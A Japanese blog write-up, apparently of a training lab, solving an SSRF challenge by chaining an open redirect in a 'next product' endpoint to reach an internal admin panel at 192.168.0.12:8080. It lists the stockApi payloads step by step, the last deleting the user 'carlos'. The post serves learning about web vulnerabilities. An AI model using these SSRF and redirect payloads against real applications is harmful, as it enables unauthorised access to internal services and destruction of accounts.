shikata ga nai

Private? There is no such things.

SSRF with filter bypass via open redirection vulnerabilityをやってみた

Hello there, ('ω')ノ

 

オープンリダイレクトの脆弱性によるフィルタバイパスを備えたSSRFを。

まずは、Check stackしてからNext productして。

 

f:id:ThisIsOne:20210216092124p:plain

 

Check stockのリクエストをリピータへ。

 

f:id:ThisIsOne:20210216094151p:plain

 

下記に変更して実行してみるとエラーが。

 stockApi=http://192.168.0.12:8080

 

f:id:ThisIsOne:20210216094315p:plain

 

次にNext productのリクエストをリピータへ。

 

f:id:ThisIsOne:20210216094355p:plain

 

f:id:ThisIsOne:20210216095505p:plain

 

Next productのリクエストをCheck stockのリクエストのstockApiで実行すると。

エラーステータスが変わって。

 stockApi=/product/nextProduct?path=http://192.168.0.12:8080

 

f:id:ThisIsOne:20210216094525p:plain

 

adminを追加して実行すると管理者画面が。

 stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin

 

f:id:ThisIsOne:20210216094605p:plain

 

もとのページにもどって、再度Check stockを実行して。

 

f:id:ThisIsOne:20210216094738p:plain

 

さきほどのペイロードにstockApiを変更して管理者ページを。

 

f:id:ThisIsOne:20210216094800p:plain

 

carlosのDeleteパラメータを確認して。

 

f:id:ThisIsOne:20210216094834p:plain

 

下記のように再度、ペイロードを実行すると。

 stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

 

f:id:ThisIsOne:20210216094954p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210216100039p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain